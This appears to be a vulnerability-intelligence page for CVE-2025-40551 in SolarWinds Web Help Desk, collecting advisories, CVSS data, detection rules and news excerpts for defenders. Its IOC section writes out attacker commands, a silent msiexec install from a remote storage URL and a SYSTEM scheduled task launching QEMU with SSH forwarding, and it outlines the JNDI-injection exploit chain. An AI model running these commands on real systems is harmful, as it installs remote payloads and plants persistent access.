CVE-2025-40551
published 2026-01-28CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-02-06
Exploited in the wild
EPSS
84.13%
99.7th percentile
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | azl3_shim_15.4-2_on_azure_linux_3.0 | — | — |
| msrc | azl3_shim_15.8-5_on_azure_linux_3.0 | — | — |
| msrc | azure_linux_3.0_arm | — | — |
| msrc | azure_linux_3.0_x64 | — | — |
| msrc | cbl2_shim_15.4-2_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_shim_15.8-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl_mariner_2.0_arm | — | — |
| msrc | cbl_mariner_2.0_x64 | — | — |
| solarwinds | web_help_desk | < 2026.1 | 2026.1 |
| solarwinds | web_help_desk | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandmsiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi↗
commandSCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db - device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"↗
sigma↗
any where host.os.type == "windows" and (
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)- →Monitor for cmd.exe, powershell.exe, or rundll32.exe spawned as child processes of java.exe located under C:\Program Files\WebHelpDesk\ or C:\Program Files (x86)\WebHelpDesk\; this represents the initial exploitation shell chain. ↗
- →Alert on DLL loads by WebHelpDesk java.exe where the DLL path starts with \Device\Mup\ (UNC/network path) or the DLL has an untrusted or absent code signature — indicates remote DLL loading post-exploitation. ↗
- →Hunt for creation of a scheduled task named 'TPMProfiler' running as SYSTEM on startup, executing qemu-system-x86_64.exe with SSH port-forwarding arguments (hostfwd=tcp::22022-:22). ↗
- →Detect QEMU (qemu-system-x86_64.exe) running from a user temp directory (C:\Users\*\tmp\) with network device arguments — indicates SSH tunnel establishment for persistent access. ↗
- →Monitor for Cloudflared (Cloudflare Tunnel client) being silently installed via msiexec from a remote GitHub URL, used by threat actors for encrypted C2 tunneling. ↗
- →Detect Active Directory reconnaissance command 'net group "domain computers" /do' executed from processes descended from the WebHelpDesk java.exe process tree. ↗
- →Monitor for NTDS.dit access or copy operations on domain controllers following SolarWinds WHD exploitation; threat actors performed DCSync and NTDS.dit extraction for credential dumping. ↗
- →CVE-2025-40551 affects SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions; scope detection and patching efforts accordingly. ↗
- ·Attribution of the active exploitation campaigns to CVE-2025-40551 specifically is not yet confirmed; multiple CVEs (CVE-2025-26399, CVE-2025-40536, CVE-2025-40551) may be responsible. ↗
- ·Elastic Security Labs had not yet observed direct telemetry for this activity at time of publication; detections are based on Microsoft's external reporting. ↗
- ·Velociraptor and Cloudflared are legitimate tools; their installation alone may appear benign in many enterprise environments — context (parent process, install source URL) is critical for accurate detection. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_msrc5.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
cisa·2026-02-03·CVSS 9.8
CVE-2025-40551 [CRITICAL] CWE-502 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
Vulnerability: SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
Affected: SolarWinds Web Help Desk
SolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551 ; https://nvd.nist.gov/vuln/detail/CVE-2025-40551
Remediation Due Date: 2026-02-06
Microsoft
Shim: out of bounds read when parsing mz binaries
vendor_msrc·2024-01-09·CVSS 5.1
CVE-2023-40551 [MEDIUM] CWE-125 Shim: out of bounds read when parsing mz binaries
Shim: out of bounds read when parsing mz binaries
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mariner: Mariner
redhat: redhat
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Reference: https://learn.mic
GHSA
GHSA-7qrj-j83p-3vqg: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, whic
ghsa_unreviewed·2026-01-28
CVE-2025-40551 [CRITICAL] CWE-502 GHSA-7qrj-j83p-3vqg: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, whic
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
VulnCheck
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
vulncheck·2025·CVSS 9.8
CVE-2025-40551 [CRITICAL] CWE-502 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
SolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Affected: SolarWinds Web Help Desk
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399; https://www.recordedfuture.com/blog/january-2026-cve-landscape
Suricata
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)
suricata·2026-01-29·CVSS 8.1
CVE-2025-40536 [HIGH] ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Authentication Bypass (CVE-2025-40536)"; flow:established,to_server; http.uri; content:"/helpdesk/WebObjects/Helpdesk.woa/wo/"; fast_pattern; content:"/ajax/"; content:"wopage|3d|"; http.method; content:"GET"; reference:url,horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/; reference:cve,2025-40536; classtype:web-application-attack; sid:2067188; rev:1; metadata:affected_product SolarWinds, attack_target Server, tls_state TLSDecrypt, created_at 2026_01_29, cve CVE_2025_40536, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Medium, signat
Suricata
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)
suricata·2026-01-29·CVSS 9.8
CVE-2025-40551 [CRITICAL] ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)
ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Java Deserialization (CVE-2025-40551)"; flow:established,to_server; http.uri; content:"/helpdesk/WebObjects/Helpdesk.woa/wo/"; fast_pattern; pcre:"/^[\d\.]+/R"; http.request_body; content:"|22|java|2e|"; pcre:"/^[^\x22]*?(?:parentpopup|wonoselectionstring|dummy|mdssubmitlink|mdsform__enterkeypressed|mdsform__shiftkeypressed|mdsform__altkeypressed|_csrf)/R"; content:"|22|method|22 3a|"; content:"|22|wopage|2e|"; within:9; reference:url,horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/
Elastic
Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
elastic_rules·CVSS 9.8
CVE-2025-40536 [CRITICAL] Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
Identifies the SolarWinds Web Help Desk Java process loading an untrusted or remote native module (DLL).
This behavior is uncommon for the Web Help Desk server and may indicate successful exploitation of
deserialization vulnerabilities (CVE-2025-40536, CVE-2025-40551), which allow attackers to load malicious
SQLite extensions and achieve remote code execution.
Query:
any where host.os.type == "windows" and
(
(event.category == "library" and
process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
(dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
(event.category == "process" and process.
Nuclei
SolarWinds Web Help Desk - Authentication Bypass
nuclei·CVSS 9.8
CVE-2025-40554 [CRITICAL] SolarWinds Web Help Desk - Authentication Bypass
SolarWinds Web Help Desk - Authentication Bypass
SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endpoint, an unauthenticated attacker can access privileged administrative functions including authentication configuration settings, SAML/CAS setup, and API key management.
Template:
id: CVE-2025-40554
info:
name: SolarWinds Web Help Desk - Authentication Bypass
author: Bushi-gg
severity: critical
description: |
SolarWinds Web Help Desk 12.8.8 HF1 and earlier contains an authentication bypass vulnerability in the WebObjects session handling. By crafting a request with a manipulated path component to an internal admin page endp
Nuclei
SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
nuclei·CVSS 9.8
CVE-2025-40536 [CRITICAL] SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
Template:
id: CVE-2025-40536
info:
name: SolarWinds Web Help Desk < 12.8.8 Hotfix 1 (HF1) - Security Control Bypass
author: inokii
severity: high
description: |
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
impact: |
Attackers can gain access to certain restricted functionality.
remediation: |
Apply the available 12.8.8 Hotfix 1 (HF1) or upgrade to ve
Nuclei
SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
nuclei·CVSS 9.8
CVE-2025-40551 [CRITICAL] SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
SolarWinds Web Help Desk before version 2026.1 contains an insecure deserialization vulnerability in the jabsorb JSON-RPC library. When chained with a CSRF whitelist bypass (CVE-2025-40536), remote unauthenticated attackers can exploit JNDI injection via the Apache Xalan JNDIConnectionPool class to achieve remote code execution. The bypass involves including "/ajax/" in a query parameter to circumvent URI validation, while switching from "/ajax/" to "/wo/" endpoints bypasses payload sanitization routines.
Template:
id: CVE-2025-40551
info:
name: SolarWinds Web Help Desk < 2026.1 - Unauthenticated JNDI Injection RCE
author: Horizon3.ai
severity: critical
description: |
SolarWinds Web Help Desk before version 2026.1 c
Metasploit
SolarWinds Web Help Desk unauthenticated RCE
metasploit·CVSS 9.8
CVE-2025-40536 [CRITICAL] SolarWinds Web Help Desk unauthenticated RCE
SolarWinds Web Help Desk unauthenticated RCE
This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk (WHD) server.
Bleepingcomputer
Critical Microsoft SharePoint flaw now exploited in attacks
blogs_bleepingcomputer·2026-03-19·CVSS 9.8
CVE-2026-20963 [CRITICAL] Critical Microsoft SharePoint flaw now exploited in attacks
## Critical Microsoft SharePoint flaw now exploited in attacks
## Sergiu Gatlan
A critical Microsoft SharePoint vulnerability patched in January is now being exploited in attacks, the Cybersecurity and Infrastructure Security Agency (CISA) warned.
Tracked as CVE-2026-20963 , this security flaw affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition.
SharePoint Server 2007, SharePoint Server 2010, and SharePoint Server 2013 are also vulnerable to attacks but are end-of-support and no longer receive security updates. Admins are advised to upgrade end-of-support SharePoint Server versions to a supported version to block attacks.
Successful exploitation enables threat actors without privileges to achieve remote code execution on unpatc
Elastic
SolarWinds Web Help Desk Exploitation - February 2026 — Elastic Security Labs
blogs_elastic·2026-02-10·CVSS 9.8
[CRITICAL] SolarWinds Web Help Desk Exploitation - February 2026 — Elastic Security Labs
## SolarWinds Web Help Desk Exploitation - February 2026
Elastic Security detection and prevention capabilities for the recently-disclosed SolarWinds Web Help Desk vulnerabilities.
## Summary
On February 6, 2026, Microsoft reported the exploitation of SolarWinds Web Help Desk (WHD) servers
The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access
While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: CVE-2025-26399 , CVE-2025-40536 , and CVE-2025-40551
Elastic Security Labs does not observe telemetry events related to this activity as of the date of this publication
Elastic Defend provides comprehensive visibility,
Elastic
SolarWinds Web Help Desk Exploitation - February 2026 — Elastic Security Labs
blogs_elastic·2026-02-10·CVSS 9.8
[CRITICAL] SolarWinds Web Help Desk Exploitation - February 2026 — Elastic Security Labs
10 February 2026•Elastic Security Labs
# SolarWinds Web Help Desk Exploitation - February 2026
Elastic Security detection and prevention capabilities for the recently-disclosed SolarWinds Web Help Desk vulnerabilities.
5 min readProduct Updates
## Summary
- On February 6, 2026, Microsoft reported the exploitation of SolarWinds Web Help Desk (WHD) servers
- The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access
- While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551
- Elastic Security Labs does not observe telemetry events related to this activity as of the date of
Bleepingcomputer
Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
blogs_bleepingcomputer·2026-02-09·CVSS 9.8
[CRITICAL] Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
## Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
## Bill Toulas
Hackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes, such as the Zoho ManageEngine remote monitoring and management tool.
The attacker targeted at least three organizations and also leveraged Cloudflare tunnels for persistence, and the Velociraptor cyber incident response tool for command and control (C2).
The malicious activity was spotted over the weekend by researchers at Huntress Security, who believe that it is part of a campaign that started on January 16 and leveraged recently disclosed SolarWinds WHD flaws.
“On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in
Huntress
Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)
blogs_huntress·2026-02-08·CVSS 9.8
[CRITICAL] Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)
Acknowledgments: Special thanks to Dipo Rodipe, Dray Agha, and Lindon Wass for their contributions to this investigation and write-up.
TL;DR : Huntress has observed threat actors exploiting SolarWinds Web Help Desk vulnerability across 3 customers; organizations should apply the update from SolarWinds’ website as soon as possible.
## Background
On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control.
This intrusion stemmed from the many recently disclosed vulnerabilities affecting SolarWinds WHD. The most critical vulnerabilities grant an adversary arbitrary code execution vi
Bleepingcomputer
CISA flags critical SolarWinds RCE flaw as exploited in attacks
blogs_bleepingcomputer·2026-02-03·CVSS 7.5
CVE-2025-40551 [HIGH] CISA flags critical SolarWinds RCE flaw as exploited in attacks
## CISA flags critical SolarWinds RCE flaw as exploited in attacks
## Sergiu Gatlan
CISA has flagged a critical SolarWinds Web Help Desk vulnerability as actively exploited in attacks and ordered federal agencies to patch their systems within three days.
Tracked as CVE-2025-40551 , this security flaw stems from an untrusted data deserialization weakness discovered and reported by Horizon3.ai security researcher Jimi Sebree , which can allow unauthenticated attackers to gain remote command execution on unpatched devices.
"SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution which would allow an attacker to run commands on the host machine," the company explained on January 28 when it released Web
Bleepingcomputer
SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws
blogs_bleepingcomputer·2026-01-28·CVSS 9.8
CVE-2025-40552 [CRITICAL] SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws
## SolarWinds warns of critical Web Help Desk RCE, auth bypass flaws
## Sergiu Gatlan
SolarWinds has released security updates to patch critical authentication bypass and remote command execution vulnerabilities in its Web Help Desk IT help desk software.
The authentication bypass security flaws (tracked as CVE-2025-40552 and CVE-2025-40554 ) patched today by SolarWinds were reported by watchTowr's Piotr Bazydlo and can be exploited by remote unauthenticated threat actors in low-complexity attacks.
Bazydlo also found and reported a critical remote code execution (RCE) flaw ( CVE-2025-40553 ) stemming from an untrusted data deserialization weakness that can enable attackers without privileges to run commands on vulnerable hosts.
A second RCE vulnerability ( CVE-2025-40551 ) reported by
Wiz
CVE-2025-40553 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40553 [HIGH] CVE-2025-40553 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40553 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 94.4
Exploitation Probability (EPSS) 14.5
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity
Wiz
CVE-2025-40536 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2025-40536 [HIGH] CVE-2025-40536 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40536 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 8.1
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 98.6
Exploitation Probability (EPSS) 68.3
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 29, 2026
Windows Seve
Wiz
CVE-2025-40537 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40537 [HIGH] CVE-2025-40537 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40537 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions.
Source : NVD
## 7.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 7.5
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity HIGH Has Fix Added at: Jan 29, 2026
Windows Severity HIGH Has Fix Added at: Jan 29, 2026
#
Wiz
CVE-2025-40551 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40551 [HIGH] CVE-2025-40551 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40551 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 99.6
Exploitation Probability (EPSS) 89.5
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity
Wiz
CVE-2025-40554 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40554 [HIGH] CVE-2025-40554 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40554 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 90.7
Exploitation Probability (EPSS) 6.1
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 29, 2026
Windows Severity CRITICAL Has Fix
Wiz
CVE-2025-40552 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-40552 [HIGH] CVE-2025-40552 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40552 :
SolarWinds Web Help Desk vulnerability analysis and mitigation
SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
Source : NVD
## 9.8
Score
Published January 28, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
SolarWinds Web Help Desk
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 91.8
Exploitation Probability (EPSS) 7.5
Affected packages and libraries
cpe:2.3:a:solarwinds:web_help_desk
Sources
Linux Severity CRITICAL Has Fix Added at: Jan 29, 2026
Wi
Recorded Future
January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
blogs_recorded_future·CVSS 4.9
[MEDIUM] January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
# January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.
What security teams need to know:
- APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
- Microsoft and SmarterTools lead concerns: These vendors accounte
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2026-01-28
Published
2026-02-03
Added to CISA KEV
Exploited in the wild